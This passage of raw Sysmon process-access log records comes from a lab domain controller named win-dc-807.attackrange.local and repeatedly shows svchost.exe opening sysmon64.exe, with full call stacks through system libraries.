32\ntdll.dll+51791 10341000x80000000000000001633Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.191{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001632Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.191{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001631Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.191{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001630Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.191{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001629Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.175{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001628Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.175{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001627Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.175{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001626Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.175{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001625Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.175{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001624Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.175{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001623Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.175{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001622Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.175{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001621Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.175{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001620Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.160{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001619Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.160{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001618Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.160{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001617Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.160{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001616Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.160{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001615Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.160{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001614Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.160{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001613Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.160{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001612Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.160{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001611Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.160{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001610Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.160{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001609Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 